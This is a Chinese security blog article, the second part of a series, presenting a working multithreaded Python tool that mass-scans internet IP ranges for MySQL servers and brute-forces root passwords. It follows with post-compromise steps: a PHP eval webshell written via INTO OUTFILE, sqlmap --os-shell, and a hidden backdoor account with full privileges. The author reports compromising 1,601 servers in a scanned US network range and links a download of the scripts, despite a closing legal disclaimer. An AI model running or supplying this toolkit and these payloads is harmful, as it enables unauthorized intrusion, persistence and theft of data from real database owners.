实战攻防
高效python脚本,6小时获取上千台mysql数据库服务器(下)
2019-01-08 13:50

 接着上篇《高效python脚本,6小时获取上千台mysql数据库服务器(上)》,现在接着来看后续的。

反思:

在之前测试中,发现有好些的主机在线却ping不通,现在的服务器为了避免恶意的网络攻击,一会拒绝用户Ping服务器。而且调用系统命令行来ping主机是否存活这步骤也很消耗性能,无法设置较高的线程,只能维持在几百。

改进:

于是直接删去ping功能,直接调用mysql函数连接3306端口,通过设置join()的超时设置来判断端口是否开放。因为一般情况下,若mysql服务端口3306端口不开放,返回不能连接的错误需要6~8秒左右,但若该端口开放,1秒便能回应。因此设置join(3),若3秒内无回应,则默认端口关闭,销毁该线程。这样改进以后,线程能开到10000左右,效率翻倍提高,代码也更加简洁。

以下是此次的代码-5:

#!/usr/bin/envpython

#coding=utf-8

#author:Blus

importMySQLdb

importthreading

importtime

importIPy

defMySQLdb_connect(ip,  mysql_password,event):

event1=event

try:

event1.clear()

MySQLdb.connect(ip,mysql_user, mysql_password, '' , 3306)

event1.clear()

print ip + ":"+ mysql_password + "  connected"

ip_log('port_connected.txt',ip, mysql_password)

except Exception,e:

e = str(e)

#print e

if (e.find('Accessdenied') != -1):

#端口开放,但密码错误,记录并继续下面的爆破代码

event1.set() #设置爆破标志

print ip + ":"+ mysql_password + "  密码错误"

#ip_log('port_opend.txt',ip, "密码错误")

pass

elif (e.find('manyconnections') != -1):

# 连接过多,暂停1秒

time.sleep(1)

event1.set()

pass

elif (e.find('Can\'tconnect') != -1):

# 端口未开放,退出

event1.clear()

else:

# 其他错误,记录并退出

event1.clear()

ip_log('port_opend.txt',ip, e)

return

#爆破函数

defmysql_connect2(ip):

# 先尝试空密码连接threading.Event()

event1 = threading.Event()

t2 =threading.Thread(target=MySQLdb_connect, args=(ip, '',event1))

t2.start()

t2.join(3) #3秒超时

if not event1.isSet():

#未设置标识则退出

return

ip_log('port_opend.txt', ip,"密码错误")

# 开始爆破

fp_mp =open('mysql_password.txt', 'r')

for mysql_password infp_mp.readlines():

#event2 =threading.Event()

mysql_password =mysql_password.replace('\r', "").replace('\n', "")

t2 =threading.Thread(target=MySQLdb_connect, args=(ip, mysql_password,event1))

t2.start()

t2.join(5)  # 秒超时

if not event1.isSet():

# 未设置标识则退出,不然就继续爆破

fp_mp.close()

return

fp_mp.close()

return

defip_log(txt_name,ip,content):

f1 = open(txt_name, 'a')

f1.write(ip + ":"+ content + "\r\n")

f1.close()

if__name__ == "__main__":

mysql_user='root'

#设置同时运行的线程数

threads=10000

ip1 = IPy.IP('127.0.0.1')

for ip in ip1:    

ip=str(ip)

#print ip

#限制线程数

while(threading.activeCount() > threads):

time.sleep(1)

t1 =threading.Thread(target=mysql_connect2, args=(ip,))

t1.start()

#当线程只剩1时,说明执行完了

while(threading.activeCount()!=1):

time.sleep(1)

print "检测结束"

优化、修补

实际测试中发现了一些报错。

报错一:

48820-5c9d1a1dbded4ad3.jpg

当同时对大量在线的mysql服务器进行密码爆破时,同时不断的读取字典文件可能会报错。于是直接改成了将字典文件读进列表,以后的每次密码爆破都只是在遍历密码列表。另外有一个注意点,Linux是有文件句柄限制的(openfiles),一般最大数为1024。出现其他情况的“Toomant opeb file”报错,也可以用这个命令ulimit-n 102400,增大打开文件数来解决。

创建密码列表:

48820-a1234fcc628e810e.png

循环读取列表:

48820-6cf93f3d5014a26d.png

为了防止意外发生写文件错误,也给它加了层“防护衣”:

48820-3eddc09debbbc5ac.png

报错信息二:

48820-836bd012c2f49faf.png

之前没有考虑这个问题,实际测试中也蛮多的,发生在网站状态不稳定的情况下。没什么好说的,错误信息判断里面补上.在错误信息判断里面补上,网络不好就暂停一会儿。

48820-6e6598969aa03c76.jpg

以下是本次的完整代码-6:

#!/usr/bin/envpython

#coding=utf-8

#author:Blus

importMySQLdb

importthreading

importtime

importIPy

defMySQLdb_connect(ip,  mysql_password,event):

event1=event

try:

event1.clear()

MySQLdb.connect(ip,mysql_user, mysql_password, '' , 3306)

event1.clear()

print ip + ":"+ mysql_password + "  connected"

ip_log('port_connected.txt',ip, mysql_password)

except Exception,e:

e = str(e)

#print e

if (e.find('Accessdenied') != -1):

#端口开放,但密码错误,记录并继续下面的爆破代码

event1.set() #设置爆破标志

#print ip + ":"+ mysql_password + "  密码错误"

#ip_log('port_opend.txt',ip, "密码错误")

pass

elif (e.find('manyconnections') != -1):

# 连接过多,暂停1秒

time.sleep(1)

event1.set()

pass

elif (e.find('Can\'tconnect') != -1):

# 端口未开放,退出

event1.clear()

else:

# 其他错误,记录并退出

event1.clear()

ip_log('port_opend.txt',ip, e)

return

#爆破函数

defmysql_connect2(ip):

# 先尝试空密码连接threading.Event()

event1 = threading.Event()

t2 =threading.Thread(target=MySQLdb_connect, args=(ip, '',event1))

t2.start()

t2.join(3) #3秒超时

if not event1.isSet():

#未设置标识则退出

return

ip_log('port_opend.txt', ip,"密码错误")

# 开始爆破

global list_password

for mysql_password inlist_password:

mysql_password =mysql_password.replace('\r', "").replace('\n', "")

t2 =threading.Thread(target=MySQLdb_connect, args=(ip, mysql_password,event1))

t2.start()

t2.join(5)  # 秒超时

if not event1.isSet():

# 未设置标识则退出,不然就继续爆破

fp_mp.close()

return

return

defip_log(txt_name,ip,content):

try:

f1 = open(txt_name, 'a')

f1.write(ip + ":"+ content + "\r\n")

f1.close()

except Exception, e:

print str(e)

pass

if__name__ == "__main__":

#设置数据库用户名

mysql_user='root'

#设置同时运行的线程数

threads=10000

#指定IP网段

ip1 =IPy.IP('192.168.50.1/32')

#将密码字典读进列表

list_password= []

fp_mp =open('mysql_password.txt', 'r')

for password infp_mp.readlines():

list_password.append(password)

for ip in ip1:    

ip=str(ip)

#限制同时运行的线程数

while(threading.activeCount() > threads):

time.sleep(1)

t1 =threading.Thread(target=mysql_connect2, args=(ip,))

t1.start()

while(threading.activeCount()!=1):

# 当线程只剩1时,说明执行完了

time.sleep(1)

print "检测结束"

获取数据库服务器权限

至此,MySql工具基本升级完成,本来还应该加上相关的自动攻击代码,但发现目前网上还存在大量弱口令连接的数据库服务器,而且数据库服务器重要的是数据,其数据比一台服务器的权限更宝贵。因此,在这就只是简单和大家探讨几种常见的Mysql攻击手段。

1.system函数调用系统命令

在MySQL5.x中增加了system命令,简单的符号是\!,从而使MySQL可以执行系统的命令。例如systemifconfig或者\!ifconfig。

当然不一定会开启这个函数,可以在mysql命令行下输入help,来查看是否存在system函数,若有则能使用该函数。

2. outfile写小马

只限于站库未分离的服务器,写在数据库的字段中写入小马内容,再利用outfile导出成一个小马,放置于web目录下。基本命令如下:

createdatabase A123456666;

useA123456666;

CREATETABLE A123456666.B123456 (C123456 TEXT NOT NULL );

INSERTINTO B123456 (C123456)VALUES ('111');

SELECTC123456 from B123456 into outfile '网站路径/shell.php';

dropdatabase A123456666;

也可以简化为:

SELECT'<?php @eval($_POST[cmd]); ?>'  into outfile  '/var/www/html/shell.php';

3.另外还有udf、mof提权,以及msf、sqlmap自动工具之类的

举例:  sqlmap.py-d   "mysql://root:1234@192.168.1.1:3306/databasename" --os-shell

哪怕无法获得整台服务器的权限,但只要能一直维持对数据库的访问也是极好的。

服务器的数据库密码很可能会被更改,因此在获得数据库的密码后,立刻创建一个新账户还是比较重要的。可以紧接着执行如下命令:

CREATEUSER 'big'@'%' IDENTIFIED BY '123456';创建用户名为big,密码为123456的用户

GRANTALL PRIVILEGES ON *.* TO 'big'@'%' IDENTIFIED BY '123456';授权

flushprivilege;刷新权限

十、测试分析结果

 是骡是马得拉出来溜溜,选了个明媚的中文,开了主机运行脚本,每台一万个线程,跑了大半天米国的某X.0.0.0/8网段。本不抱什么希望,最后结果却出人意料。

 共计255x255x255=16581375个IP,其中有44979个mysql服务器在线,其中4,776个只允许指定的ip连接,553个端口报错,37450个端口可正常连接。在可正常连接的37450端口中,爆破密码成功连接的有1601个,真可谓是“万里挑一”。

48820-91f90207485f4145.jpg

48820-4dcd51023c1258f7.png

48820-899b74aef3d93903.jpg

下面附上部分截图:

爆破成功的记录

48820-003ddaaf546b8895.jpg

测试中出现过的报错情况:

48820-f32eb5ae9e1496c5.png

数据库截图,虽然是美国的网段,但发现也有其他国家地区部署的数据库,包括中国。

48820-d2e6542061ef95b7.jpg

48820-c2155a418d4ae9ac.png

48820-5852652ebf19882b.png

48820-2e09c1ad2817c9af.png

48820-bc281119cbf21a10.png

发现一些已经被黑客攻击的网站,数据库被删除,只留下WARNING-Readme。受害者只有向黑客支付比特币才能恢复数据。国内一般都是直接脱库、分类、汇总,然后卖数据。

48820-8c038cb93113a6c4.png

勒索信息:

“Your Database isdownloaded and backed up on our secured servers. To recover your lostdata: Send 0.6 BTC to our BitCoin Address and Contact us by eMailwith your server IP Address and a Proof of Payment. Any eMail withoutyour server IP Address and a Proof of Payment together will beignored. We will drop the backup after 24 hours. You are welcome!.”

结语

可能有人会说,不就是个批量爆破工具吗。但我并不只是想分享一个工具,同时也是把这个脚本诞生的过程一步一步的展现出来,便于大家探讨学习。不只是单纯的用工具,更是要学会工具背后的原理及其意义。另外就是与大家分享一下安全现状,如果只是自己在扫,也不一定有耐心能扫出这么多带漏洞的服务器,我在扫的时候,有时候连扫几十个网段都不见得有一台mysql服务器。 这次扫描的X.0.0.0 -X.127.0.0网段只扫出来50台MySql服务器。而X.128.0.0-X.255.0.0却有上万台。可能是因为很多云服务器厂家,包括大型企事业单位,他们服务器的ip都是“扎堆”在一起的吧。因此网段选得好,也能影响最后的结果。这需要“手气”,同时也需要耐心。在爆破密码的时候更需要一个精巧的字典,在精不在多,本人使用的字典只有5kb,但却包含了许多的高频弱口令。每年都会有TOP100的弱口令报告出来,要注意收集。国外的安全情况如此,国内的安全情况也不容乐观,我们储存在网上的个人信息和数据很容易就会被不法分子窃取。作为网络安全从业者的我们,应该积极响应国家号召,在自己的岗位上尽心尽力,遵守国家的法律。不去做危害计算机安全的事,哪怕是国外的服务器。每年都有入狱的“黑客”,望大家引以为戒。也希望能大家一起学习成长,有兴趣的大佬可以加我的微信jjinchengg,谢谢。

上述所有脚本已打包:https://pan.baidu.com/s/12skXEu2wLP0W_0LSYMZ0eQ

提取码:jy0h

压缩包密码是:blusblus




▲本文仅用于普及网络安全知识,提高小伙伴的安全意识的同时介绍常见漏洞的特征等,若读者因此做出危害网络安全的行为后果自负,与合天智汇以及原作者无关,特此声明。本文为原创文章,转载请注明出处!

上一篇:高效python脚本,6小时获取上千台mysql数据库服务器(上)
下一篇:当骗子利用漏洞诈骗……
版权所有 合天智汇信息技术有限公司 2013-2021 湘ICP备2024089852号-1
Copyright © 2013-2020 Heetian Corporation, All rights reserved
4006-123-731